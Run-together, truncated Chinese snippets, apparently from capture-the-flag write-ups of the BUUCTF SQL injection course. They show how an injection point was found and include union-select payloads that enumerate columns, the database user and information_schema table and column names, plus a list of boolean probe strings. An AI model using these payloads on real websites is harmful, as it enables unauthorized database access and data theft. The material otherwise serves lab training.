id=0unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()# 1、判断是否存在注入、注入是字符型还是数字型 id=1 order by 1# id=1' order by 1# 数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致) id=1 order by 2# ...
BUUCTF_BUU SQL COURSE 1 打开实例 发现“热点”及“登录”两个选项 根据题目提示,sql注入,尝试在登录界面寻找注入点,无果 接着进入热点界面,发现三篇新闻,依次点击发现url变化,burp抓包 发现是通过对id值的控制访问不同界面,由此发现注入点 1.判断注入类型,输入1,2
id=-1 union select user(),2得到用户root@localhost //group_get()函数用于回显所有数据 开始sql注入爆破表名?id= -1 union select 1, group_concat(table_name) from information_schema.tables where table_schema = 'news'得到表名admin,contens 爆破列名?id= -1 union select 1, group_concat(column_n...
1" and "1 1" and "0 1) and (1 1) and (0 1)) and ((1 1)) and ((0 1') and ('1 1') and ('0 1") and ("1 1") and ("0 1'" and "'1 1'" and "'0 后来才知道原来注入点被隐藏了,通过F12的net可以看到注入点在content_detail.php里面 ...